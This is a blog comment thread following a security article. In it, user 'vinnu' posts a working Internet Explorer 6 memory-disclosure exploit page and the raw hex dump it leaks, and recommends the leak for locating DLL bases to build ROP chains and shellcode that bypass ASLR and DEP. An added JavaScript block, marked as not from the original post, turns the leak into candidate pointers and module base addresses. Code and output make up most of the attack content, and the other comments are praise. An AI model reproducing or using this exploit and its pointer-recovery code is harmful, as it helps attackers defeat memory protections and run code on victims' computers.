Blog Comments

  1. hakooraevil's Avatar
    Nice article, vinnu. I want to know more information about emulators.
  2. "vinnu"'s Avatar
    Output looks like:

    Code:
    Object.length : 9879369350050 
    77c2 0000 0003 99a0 0113 c2e3 77c2 0008 0000 b688 0013 042c 001a b060 0003 0008 
    0013 4383 75c5 1334 001c 023f 0000 004b 0000 b688 0013 2038 025b 9f98 0003 0008 
    0000 b688 0013 f2fc 001b b570 0003 0050 7714 e270 0111 e270 0111 b770 0013 0050 
    0013 de08 0013 3700 0113 af78 0003 0050 0013 de08 0013 e270 0111 af78 0003 0050 
    7714 9950 0113 9950 0113 df94 0013 0050 77c2 0000 0003 3240 0113 c2e3 77c2 004a 
    0013 dca4 0013 e7c8 0003 b650 0003 0008 0013 4383 75c5 b34c 001b b5a0 0003 004a 
    0013 de08 0013 c418 0003 b640 0003 0003 0000 b688 0013 0013 0000 714e 75c5 004a 
    7714 2f30 00d5 af78 0003 b600 0003 004a 0000 0000 0000 c380 0003 b510 0003 004a 
    0000 0000 0000 c310 0003 b620 0003 0050 77c2 0018 0000 e270 0111 e3e8 0013 0050 
    77c2 c3e7 77c2 e270 0111 e3d8 0013 0050 0003 e428 0013 e270 0111 e408 0013 0022 
    00ca 013b 000c 0000 0000 0049 0003 3240 0113 b530 0003 b358 0013 0008 0000 0000 
    0000 6d0e 55c0 0014 0000 b6ec 0003 0000 0000 0063 0068 0061 0072 0043 006f 0064 
    0065 0041 0074 0000 0000 0049 0003 0000 0000 b4d0 0003 42eb 75c5 0008 0000 000a 
    0000 442a bf2e 0010 0000 b728 0003 0000 0000 0074 006f 0053 0074 0072 0069 006e 
    0067 0000 0003 0049 0003 0000 0000 b4c0 0003 42eb 75c5 0008 0000 75f4 0003 cfa1 
    8c80 0012 0000 0000 0000 0000 0000 0073 0075 0062 0073 0074 0072 0069 006e 0067 
    0000 7841 0000 0006 0000 75f4 0003 0000 0000 0064 0069 0064 0000 000a 0000 b794 
    0003 75f4 0003 006c 0069 006d 0069 0074 0000 0049 033d e434 0013 b5f0 0003 e3d8 
    0013 0010 0000 0010 0000 7841 0000 0007 0022 0119 000c 3260 75c6 30cc 75c6 334c 
    75c6 0002 0000 aca8 0003 0000 0000 31c0 0113 deac 0013 0000 0aa0 0000 0000 0000 
    0000 0001 0000 0004 0007 0112 000c 0009 0000 0000 0000 e270 0111 c6b0 0003 fd9b 
    ffff 0000 0000 0005 0004 000f 0000 01a0 0003 01a0 0003 0040 0000 0001 0000 0002 
    0007 0001 0000 0188 0003 94a8 0003 0004 0005 01e9 0008 7ff8 75c5 0001 0000 000c 
    0000 9438 0003 000c 0000 0001 0000 001a 0004 01e5 0008 c090 0003 0063 0072 0069 
    0070 0074 0020 002d 0020 0061 006e 006f 006e 0079 006d 006f 0075 0073 0020 0066 
    0075 006e 0063 0074 0069 006f 006e 0000 0000 0000 0000 0000 0000 0000 0000 0000 
    0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 
    0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 
    0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 
    ----------------------
    ----------------------
    ----------------------
    Likewise, it discloses several pointers inside loaded DLLs, which can be used to dynamically build the ROP chain + shellcode.

    ..."vinnu"
  3. "vinnu"'s Avatar
    Namaste

    Regarding ASLR, the following code leaks enough of a memory block to grab any loaded module's base address. Though the vulnerability only affects IE 6 on Windows XP, it is a nice example for practice, and you can use this technique along with ROP to effectively bypass ASLR+DEP in practice and build expertise.

    Code:
    <html>
    <head>
    <title>IE 6 Memory disclosure exploit..."vinnu"</title>
    </head>
    <body>
    <div id="disc"></div>
    <script>
    var limit = 8000;// Above it will crash and may lead to Code Execution.
    var did = document.getElementById("disc");
    function discl()	{
    	var buf="";
    	var c="0000";	// zero padding for 4-digit hex output
    	var d=0x0000;
    	/****************************************************/
    	var a=document.createElement("select");
    	var b=a.componentFromPoint(0xff,0xff);
    	/*** Vulnerable code. componentFromPoint() on an
    	unmaterialised object leads to leaking in memory. ***/
    	
    	// b.length is garbage on the vulnerable build; limit is the only real bound.
    	did.innerHTML+="<br>Object.length : "+b.length;
    	buf="<table><tr>";
    	for(var i=0;i<limit;i++)	{
    		// one UTF-16 code unit (2 bytes of the leaked buffer) per index
    		d = b.charCodeAt(i).toString(16);
    		buf+="<td>"+c.substring(0,4-d.length)+d+"</td>";
    		if((i+1)%16==0){buf+="</tr><tr>"}	// 16 units (32 bytes) per row
    	}buf+="</tr></table>";
    	did.innerHTML += buf;
    }
    </script>
    <input type=button value="Disclose" onclick="discl()" />
    </body>
    </html>
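Added example, not part of vinnu's post or the exploit above: post-processing the charCodeAt() dump from comment 2 into candidate pointers and a module base, which is the step comment 3 relies on for the ROP chain. The sample code units are copied from the first two rows of the posted dump; the 0x70000000-0x7fffffff address range and the RVA given to deriveBase() are placeholder assumptions, not measured values for any particular DLL.

```javascript
// Added example (not from the original post): turning the charCodeAt() leak into
// candidate pointers and an image base. SAMPLE_DUMP is copied from the first two
// rows of the posted output; the address range and the RVA used with
// deriveBase() are placeholder assumptions.
const SAMPLE_DUMP =
  "77c2 0000 0003 99a0 0113 c2e3 77c2 0008 0000 b688 0013 042c 001a b060 0003 0008 " +
  "0013 4383 75c5 1334 001c 023f 0000 004b 0000 b688 0013 2038 025b 9f98 0003 0008";

// Parse the posted dump (one 4-digit hex word per charCodeAt() call) back into units.
function parseUnits(dump) {
  return dump.trim().split(/\s+/).map((h) => parseInt(h, 16));
}

// Mirrors the loop in the exploit: one UTF-16 code unit per index. On the
// vulnerable build b.length is garbage (9879369350050 in the post), so `limit`
// is the only real bound; past roughly 8000 units the read walks into unmapped
// memory and the process crashes, as the post's comment warns.
function leakToUnits(leaked, limit) {
  const n = Math.min(limit, leaked.length);
  const units = [];
  for (let i = 0; i < n; i++) units.push(leaked.charCodeAt(i));
  return units;
}

// Reassemble 32-bit little-endian dwords. charCodeAt(i) is bytes 2i..2i+1 of
// the underlying buffer, so units[i] is the low half and units[i+1] the high
// half of the dword at byte offset 2i. Every index is tried, not only even
// ones: in the posted dump the useful values (c2e3 77c2, 4383 75c5) sit at odd
// indices, i.e. the leaked string is not dword-aligned.
function findPointers(units, lo = 0x70000000, hi = 0x80000000) {
  const hits = [];
  for (let i = 0; i + 1 < units.length; i++) {
    const v = (units[i] | (units[i + 1] << 16)) >>> 0;
    if (v >= lo && v < hi) hits.push({ byteOffset: 2 * i, value: v });
  }
  return hits;
}

// Group hits by 64 KiB allocation granularity (Windows image bases are 0x10000
// aligned), so repeated references into one image stand out.
function clusterBy64K(hits) {
  const counts = new Map();
  for (const h of hits) {
    const region = (h.value & 0xffff0000) >>> 0;
    counts.set(region, (counts.get(region) || 0) + 1);
  }
  return counts;
}

// Once a leaked pointer is recognised as a known location in a known DLL build
// (its RVA, from that build's export table or a disassembly), the image base is
// ptr - rva. The alignment check rejects an RVA that cannot belong to the pointer.
function deriveBase(ptr, rva) {
  const base = (ptr - rva) >>> 0;
  return (base & 0xffff) === 0 ? base : null;
}

function hex(v) {
  return "0x" + v.toString(16).padStart(8, "0");
}

// Demo over the constructed sample; on the vulnerable page `b` is the leaked string.
function demo() {
  const leaked = String.fromCharCode(...parseUnits(SAMPLE_DUMP));
  const hits = findPointers(leakToUnits(leaked, 8000));
  for (const h of hits) console.log(`offset ${h.byteOffset}: ${hex(h.value)}`);
  for (const [region, n] of clusterBy64K(hits)) console.log(`${hex(region)}: ${n} hit(s)`);
  return hits;
}
demo();
```

Two things this makes visible that the raw table does not: the leaked buffer is offset by one code unit from dword alignment, so pairing only even indices would miss every pointer in the sample, and a 64 KiB-aligned region is only a candidate allocation, not the module base; the base still comes from subtracting an RVA you know for that DLL build, which is why the check in deriveBase() rejects an offset that does not land on a 0x10000 boundary.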
  4. paulhall's Avatar
    This is a great technique, it's really helpful. And the explanation you have shared is really appreciable.
  5. b0nd's Avatar
    ... and the knowledge is overflowing, keep sharing bro! Thanks a lot!